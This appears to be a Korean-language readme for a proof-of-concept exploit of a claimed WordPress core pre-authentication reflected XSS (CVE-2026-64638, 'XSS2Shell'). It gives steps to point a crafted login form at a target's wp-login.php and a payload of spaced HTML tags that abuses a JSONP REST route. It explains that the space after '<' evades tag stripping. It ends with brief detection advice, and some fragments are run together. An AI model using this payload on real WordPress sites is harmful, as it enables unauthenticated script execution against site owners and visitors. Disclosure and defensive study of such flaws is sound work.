
CVE-2026-64638 (XSS2shell) POC.
WordPress 사전 인증 반사형 XSS 개념 증명
WordPress 코어의 CVE-2026-64638(XSS2Shell) 파서 차등 XSS에 대한 단일 파일 HTML 개념 증명입니다. 조작된 로그인 요청을 통해 WordPress 오리진에서 인증되지 않은 JavaScript 실행을 시연합니다.
strip_tags() 대 wp_kses_post())POC.html을 엽니다.action의 http://TARGET/wp-login.php를 대상 URL로 바꿉니다.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm()alert()< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
각 < 뒤의 공백이 악용 포인트입니다. 공백이 없으면 wp_strip_all_tags()가 전부 제거합니다.
log 필드의 %3C + 공백 패턴을 차단하세요.log에 인코딩된 <가 포함된 POST /wp-login.php 요청을 모니터링하세요.